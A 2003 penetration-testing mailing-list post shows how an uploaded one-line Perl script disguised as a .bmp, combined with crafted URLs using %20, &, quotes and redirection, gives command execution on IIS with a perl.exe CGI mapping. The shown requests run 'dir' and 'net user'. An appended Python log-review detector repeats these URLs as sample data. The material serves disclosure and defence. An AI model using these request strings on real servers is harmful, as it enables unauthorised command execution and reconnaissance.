Penetration Testing mailing list archives
The Building Of An Exploit String
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Thu, 27 Feb 2003 15:01:04 +1300
*********************************************
The Building Of An Exploit String - Exploiting The PERL Under IIS
*********************************************

PERL v5.6.1 built for MSWin32-x86
*http://www.perl.com/
*http://www.activestate.com

The problems highlighted in this writeup are not directly related to the
use of perl but highlight some of the possibilities when problems with file
uploading and directory permissions are abused. It is highly possible that
these techniques could be used against other command line interpreters.

I recently audited a package that used the perl.exe interpreter on a
windows 2000 server running IIS5.

Under application configuration in the IIS management console, the .cgi
extension is mapped as:

  c:/APP/perl/bin/perl.exe %s

This allows us access to the perl executable through the use of a cgi
extension.

example:
  *http://192.168.1.1/web/test.cgi
returns:
  Can't open perl script "C:\APP\web\test.cgi": No such file or directory

This is obviously a path disclosure issue.

All attempts to pass parameters to perl.exe fail.

example:
  *http://192.168.1.1/web/-h.cgi
result:
  Can't open perl script "C:\APP\web\-h.cgi": No such file or directory

It seems that IIS is passing the full path to the interpreter.

So what we required was the ability to create a file on the server and then
pass that file to the perl interpreter.

This particular application allowed uploading of files with a .bmp
extension, so we created a small perl script

  system(@ARGV);

and uploaded it as system.bmp. This file was uploaded to the folder

  c:/APP/web/data/

IIS will only pass the file to the perl interpreter if it has a cgi
extension, which our uploaded file doesn't have.

example:
  *http://192.168.1.1/web/data/system.bmp.cgi
result:
  Can't open perl script "C:\APP\web\data\system.bmp.cgi": No such file or directory

By placing a %20 (space) or %09 (tab) between the .bmp and the .cgi we are
able to force the interpreter to execute our script.

example:
  *http://192.168.1.1/web/data/system.bmp%20.cgi
result:
  '.cgi' is not recognized as an internal or external command,
  operable program or batch file.

The system command inside our uploaded file is executing and using the .cgi
as the argv parameter. Any arguments placed before the %20.cgi will be used
by our system call.

example:
  *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi
result:
  This will result in a request to open or save to disk.

Appending a ? to the end of the url will prevent the open/save to disk
request.

example:
  *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi?
result:
  Directory of C:\APP\web
  File Not Found

This results in a File Not Found message because our script is running

  system("dir .cgi?")

This is easily avoided by inserting an & (ampersand) character after the
last argument and before the %20.cgi.

example:
  *http://192.168.1.1/web/data/system.bmp%20dir%20&%20.cgi?
result:
  Directory of C:\APP\web

  02/12/2003  09:21a      <DIR>          .
  02/12/2003  09:21a      <DIR>          ..
  02/12/2003  01:35a                  15 a.pl
  02/12/2003  12:36a      <DIR>          bin
  02/12/2003  12:36a                 206 default.htm
  etc..
                10 File(s)         17,165 bytes
                 6 Dir(s)  52,390,678,528 bytes free
  '.cgi' is not recognized as an internal or external command,
  operable program or batch file.

This will now run as

  system("dir & .cgi?")

which cmd.exe interprets as two separate dos commands.

This will not work when attempting to run executable files.

example:
  *http://192.168.1.1/web/data/system.bmp%20net%20user%20&%20%20.cgi?
result:
  More help is available by typing NET HELPMSG 2221.

example:
  *http://192.168.1.1/web/data/system.bmp%20net%20use%20&%20%20.cgi?
result:
  The network name cannot be found.

This is caused by cmd.exe interpreting the 'user & .cgi' part of the string
as the parameter to pass to 'net.exe'. This results in a call to

  "net user & .cgi"

which is invalid.

By placing " (double quotes) around our net.exe call we can modify the way
that cmd.exe will interpret the string.

example:
  *http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20%20.cgi?
result:
  ------------------------------------------------------------
  Administrator            Guest                    IUSR_BLACKHOLE
  IWAM_BLACKHOLE           NetShowServices          TsInternetUser
  VUSR_BLACKHOLE
  The command completed with one or more errors.
  '.cgi' is not recognized as an internal or external command,
  operable program or batch file.

The '.cgi' error is still being shown here as it is still being
interpreted. By adding a final command and redirecting its output to a
writable file space we can have this error removed.

example:
  *http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\a.cgi?
result:
  ------------------------------------------------------------
  Administrator            Guest                    IUSR_BLACKHOLE
  IWAM_BLACKHOLE           NetShowServices          TsInternetUser
  VUSR_BLACKHOLE
  The command completed with one or more errors.
  ..
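From the defender's side, every request in the writeup shares one shape: the path ends in the script-mapped .cgi extension, but a space or tab (and, for command execution, cmd.exe metacharacters) sits between an uploaded file's real extension and that .cgi. The following log-review check is an added example and is not code from Brett Moore's post. It reads IIS W3C extended log lines (field order taken from the #Fields directive; the cs-uri-stem is assumed to be recorded percent-encoded as sent, though the check decodes either form) and flags requests whose path ends in a script-mapped extension but carries whitespace, a second extension, or cmd.exe metacharacters before it. The sample log lines are constructed to mirror the URLs above, and SCRIPT_MAPPED_EXTS is an assumption about which extensions the server hands to perl.exe.

```python
"""
Log-review check for the IIS script-map abuse described in the post.

Added example, not part of the original post. Field layout comes from the
#Fields directive; SCRIPT_MAPPED_EXTS is an assumption about the server's
application configuration; SAMPLE_LOG is constructed, not real traffic.
"""
import re
from urllib.parse import unquote

# Assumption: extensions mapped to an interpreter in the IIS application configuration.
SCRIPT_MAPPED_EXTS = {".cgi", ".pl"}
# Characters cmd.exe treats specially; none of them belong in a legitimate script path.
SHELL_METACHARS = set('&|<>"^')

# Constructed sample log (IIS W3C extended format), modelled on the URLs in the post.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-02-12 09:21:03 10.0.0.5 GET /web/index.cgi - 200
2003-02-12 09:21:10 10.0.0.5 GET /web/data/logo.bmp - 200
2003-02-12 09:22:41 10.0.0.9 GET /web/-h.cgi - 500
2003-02-12 09:23:02 10.0.0.9 GET /web/data/system.bmp%20.cgi - 200
2003-02-12 09:23:30 10.0.0.9 GET /web/data/system.bmp%20dir%20&%20.cgi - 200
2003-02-12 09:24:01 10.0.0.9 GET /web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\\a.cgi - 200
2003-02-12 09:25:00 10.0.0.9 GET /web/data/system.bmp%09.cgi - 200
"""


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def classify_request(stem):
    """Decode the URI stem and list the reasons it looks like script-map abuse."""
    decoded = unquote(stem)
    match = re.search(r"(\.[A-Za-z0-9]+)$", decoded)
    ext = match.group(1).lower() if match else ""
    reasons = []
    if ext in SCRIPT_MAPPED_EXTS:
        before_ext = decoded[: -len(ext)]
        # Space or tab before the mapped extension: the "%20.cgi" / "%09.cgi" trick.
        if re.search(r"[ \t]", before_ext):
            reasons.append("whitespace before script-mapped extension")
        # A real extension (e.g. .bmp) right before that whitespace: an uploaded file run as a script.
        if re.search(r"\.[A-Za-z0-9]{1,5}[ \t]", before_ext):
            reasons.append("second extension separated by whitespace (uploaded file run as script)")
        # cmd.exe operators in the path: arguments being smuggled into a system() call.
        metas = sorted(set(before_ext) & SHELL_METACHARS)
        if metas:
            reasons.append("shell metacharacters in path: " + "".join(metas))
        # A script name starting with "-": probing whether the interpreter takes options.
        if decoded.rsplit("/", 1)[-1].startswith("-"):
            reasons.append("option-like script name (interpreter argument probing)")
    return {"stem": stem, "decoded": decoded, "ext": ext, "reasons": reasons}


def find_suspicious(log_text):
    """Return the classified entries that carry at least one reason, with client and status."""
    hits = []
    for entry in parse_w3c(log_text):
        info = classify_request(entry["cs-uri-stem"])
        if info["reasons"]:
            info["client"] = entry["c-ip"]
            info["status"] = entry["sc-status"]
            hits.append(info)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["client"], hit["status"], repr(hit["decoded"]))
        for reason in hit["reasons"]:
            print("   -", reason)
```

Run against the constructed log, the two ordinary requests (index.cgi, logo.bmp) produce nothing and the five shaped like the post's URLs are flagged, including the %09 variant and the failed -h.cgi probe. The check only recognises the pattern; the conditions that make it work are the ones the post names, an upload directory that sits under a script-mapped web root and a script map that is applied to a path containing whitespace, and those are what a fix has to address.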